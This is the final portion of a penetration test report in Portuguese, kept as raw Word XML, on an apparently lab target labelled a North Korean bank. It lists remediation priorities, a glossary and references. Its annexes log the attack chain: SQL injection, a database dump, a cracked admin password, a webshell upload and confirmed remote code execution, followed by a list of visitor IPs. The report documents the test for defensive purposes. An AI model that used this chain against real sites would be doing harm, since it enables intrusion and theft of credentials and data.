    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F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asr6rzbfzib" w:id="113"/>
      <w:bookmarkEnd w:id="1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⚠️ Ações Urgentes (24-48h):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PRIORIDADE 1 (AGORA):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Remover webshell phpinfo.php7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Trocar senha do admin imediatamente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Implementar validação em cat.php (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Sanitizar output (XSS)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PRIORIDADE 2 (24h):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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Corrigir upload de arquivos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Implementar rate limiting no login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Trocar MD5 por bcrypt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Atualizar PHP 5.6 → PHP 8.1+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PRIORIDADE 3 (48h):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Desabilitar directory listing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Configurar WAF corretamente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Implementar 2FA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Adicionar security headers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bvd1x2kocw" w:id="114"/>
      <w:bookmarkEnd w:id="1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📊 Resumo Estatístico:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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VULNERABILIDADES ENCONTRADAS            │</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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🔴 Críticas:  6                         │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🟠 Altas:     1                         │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🟡 Médias:    1                         │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🟢 Baixas:    1                         │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6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TOTAL:        9                         │</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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IMPACTO GERAL                           │</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Confidencialidade:  CRÍTICO             │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Integridade:        CRÍTICO             │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Disponibilidade:    ALTO                │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CVSS Base Score:    10.0 (Máximo)       │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DADOS COMPROMETIDOS                     │</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Credenciais Admin:  SIM                 │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Banco de Dados:     COMPLETO            │</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Código-Fonte:       ACESSÍVEL           │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Controle Servidor:  SIM (RCE)           │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IPs Visitantes:     346 endereços       │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hpsybjklzhq" w:id="115"/>
      <w:bookmarkEnd w:id="11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CONSIDERAÇÕES FINAIS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realização deste teste de segurança permitiu identificar vulnerabilidades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CRÍTICAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que colocam em risco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TODO O NEGÓCIO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> do Banco da Coreia do Norte.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062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ikrdy5ddu5d" w:id="116"/>
      <w:bookmarkEnd w:id="1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Pontos Positivos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062D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Cloudflare implementado (mas mal configurado)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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HTTPS disponível nas portas 443/8443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000062F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robots.txt configurado (basic)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063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gu84rlcy79" w:id="117"/>
      <w:bookmarkEnd w:id="1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Pontos Críticos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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SQL Injection sem sanitização</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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XSS Reflected sem proteção</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Upload de arquivos vulnerável</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Remote Code Execution ativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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PHP 5.6 EXTREMAMENTE desatualizado (7 anos EOL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Senha admin fraca (MD5 sem salt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Sem rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Sem 2FA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Sem security headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063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llc75qp234v" w:id="118"/>
      <w:bookmarkEnd w:id="1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Recomendação Final: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É IMPERATIVO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que as correções de prioridade crítica sejam implementadas IMEDIATAMENTE. O site está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COMPLETAMENTE VULNERÁVEL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e pode ser comprometido por qualquer atacante com conhecimento básico-intermediário em questão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HORAS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63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Recomendamos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063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Implementar TODAS as correções críticas em 24-48h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Realizar auditoria de segurança completa do código</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Contratar desenvolvedores com expertise em segurança</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Implementar programa de Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Realizar pentests periódicos (trimestral)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Treinar equipe em OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Estabelecer política de segurança corporativa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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Implementar SIEM para monitoramento 24/7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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wfxbbq3danq" w:id="119"/>
      <w:bookmarkEnd w:id="1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Próximos Passos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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Reunião de apresentação do relatório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Priorização das correções com equipe técnica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Implementação das correções críticas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Reteste após correções (incluído no escopo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Validação final de segurança</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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Emissão de certificado de conformidade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7b7rniv5g4" w:id="120"/>
      <w:bookmarkEnd w:id="12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REFERÊNCIAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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jhz1i10ocm9" w:id="121"/>
      <w:bookmarkEnd w:id="1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Padrões e Frameworks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064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OWASP Top 10: https://owasp.org/www-project-top-ten/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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PTES (Penetration Testing Execution Standard): http://www.pentest-standard.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000652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NIST Cybersecurity Framework: https://www.nist.gov/cyberframework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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efbbea6goim" w:id="122"/>
      <w:bookmarkEnd w:id="1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Vulnerabilidades Específicas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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OWASP SQL Injection Prevention: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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OWASP Password Storage: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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File Upload Security: https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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na6hpb9gnv" w:id="123"/>
      <w:bookmarkEnd w:id="1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CVEs e Vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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CWE-89 (SQL Injection): https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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CWE-79 (XSS): https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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CWE-434 (Unrestricted Upload): https://cwe.mitre.org/data/definitions/434.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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PHP Security Best Practices: https://www.php.net/manual/en/security.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065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gajy9e2sarm" w:id="124"/>
      <w:bookmarkEnd w:id="1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Ferramentas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065E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SQLMap: https://sqlmap.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Burp Suite: https://portswigger.net/burp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Nmap: https://nmap.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066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OWASP ZAP: https://www.zaproxy.org/</w:t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4qdn350z5ey" w:id="125"/>
      <w:bookmarkEnd w:id="1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Legislação:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066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LGPD (Lei Geral de Proteção de Dados): http://www.planalto.gov.br/ccivil_03/_ato2015-2018/2018/lei/l13709.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000066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ANPD (Autoridade Nacional de Proteção de Dados): https://www.gov.br/anpd/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d8nfzlnvhjt" w:id="126"/>
      <w:bookmarkEnd w:id="12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GLOSSÁRIO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SQL Injection:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Técnica de injeção de código que explora vulnerabilidades em queries SQL para obter acesso não autorizado ao banco de dados.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XSS (Cross-Site Scripting):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerabilidade que permite injeção de scripts maliciosos em páginas web visualizadas por outros usuários.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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RCE (Remote Code Execution):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerabilidade que permite execução arbitrária de comandos no servidor remoto.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WAF (Web Application Firewall):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Firewall que filtra e monitora tráfego HTTP entre aplicação web e a internet.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2FA (Two-Factor Authentication):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Método de autenticação que requer dois fatores diferentes para verificar identidade.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SUID (Set User ID):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permissão especial em sistemas Unix que permite executar arquivo com privilégios do proprietário.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Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Técnica para obter privilégios de nível superior (ex: de usuário comum para root).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Hash MD5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Função criptográfica de hash de 128 bits, considerada insegura para senhas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Bcrypt:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Função de hash adaptativa para senhas, baseada no algoritmo Blowfish.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CVSS (Common Vulnerability Scoring System):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema padronizado para avaliação de severidade de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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LGPD:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lei Geral de Proteção de Dados Pessoais (Lei nº 13.709/2018).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ANPD:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autoridade Nacional de Proteção de Dados.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EOL (End of Life):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fim do ciclo de vida de um software, sem mais atualizações ou suporte.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ke4gv4h1kjr" w:id="127"/>
      <w:bookmarkEnd w:id="12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ANEXOS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z2y82eul5mn" w:id="128"/>
      <w:bookmarkEnd w:id="1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Anexo A: Logs de Exploração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[2025-11-06 19:23:36] Início do teste de penetração</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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[2025-11-06 19:30:15] SQL Injection identificada em cat.php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[2025-11-06 20:04:45] Security Headers analisados - Grade F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[2025-11-11 16:46:17] SQLMap iniciado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[2025-11-11 17:17:09] Credenciais obtidas: admin / 7b71be0...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[2025-11-11 17:18:23] Dump de tabela users completo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[2025-11-11 17:23:08] Dump de database completo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000067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[2025-11-12 16:36:09] Hash MD5 identificado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[2025-11-12 16:44:19] Hash quebrado: senhafoda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[2025-11-12 XX:XX:XX] Login administrativo bem-sucedido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[2025-11-12 XX:XX:XX] XSS Reflected confirmado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[2025-11-12 XX:XX:XX] Upload de phpinfo.php7 bem-sucedido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[2025-11-12 XX:XX:XX] RCE confirmado - comando ls executado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[2025-11-12 XX:XX:XX] Enumeração do sistema iniciada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[2025-11-12 XX:XX:XX] Privilege escalation vetores identificados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[2025-11-12 XX:XX:XX] Limpeza realizada - webshell removida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[2025-11-12 XX:XX:XX] Teste concluído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2vwz7t6f1xb" w:id="129"/>
      <w:bookmarkEnd w:id="1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Anexo B: Lista Completa de IPs (stats table)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Total de IPs rastreados: 346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Amostra (primeiros 50):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66.249.79.145, 66.249.79.151, 66.249.79.153, 66.249.79.157,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66.249.79.17, 66.249.79.175, 66.249.79.178, 66.249.79.71,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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187.45.181.97, 201.37.36.92, 189.35.154.10, 179.126.36.94,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[... 296 IPs adicionais ...]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Lista completa disponível em arquivo separado por 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questões de privacidade (LGPD).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2ubfyuni4k9" w:id="130"/>
      <w:bookmarkEnd w:id="1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Anexo C: Estrutura Completa de Diretórios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/var/www/html/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index.php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cat.php (VULNERÁVEL - SQL Injection + XSS)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show.php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all.php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header.php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footer.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069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wp-config.php (403)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000069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/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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login.php (VULNERÁVEL - No rate limit, no 2FA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006A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dashboard.php (estimado)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└── /uploads/ (VULNERÁVEL - Directory listing + RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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├── phpinfo.php7 (WEBSHELL - REMOVIDA)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├── 1490906279.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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├── dsc_0699-min.jpg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    └── north-korea-science-technology.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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/assets/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Image-with-tag.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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Logos.png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Screen-background.png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animate.css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common.js.download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jquery.js.download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B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style.css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favicon.ico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└── [~30 arquivos adicionais]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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B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/classes/ (VULNERÁVEL - Directory listing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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auth.php (391 bytes)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category.php (1.3K)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db.php (124 bytes - CRÍTICO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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phpfix.php (100 bytes)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picture.php (3.1K)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├── stats.php (460 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B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└── user.php (550 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006B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├── /css/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   └── [arquivos de estilo]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006C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│</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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└── /images/ (VULNERÁVEL - Directory listing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000006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└── [arquivos de imagem]</w:t>
      </w:r>
    </w:p>
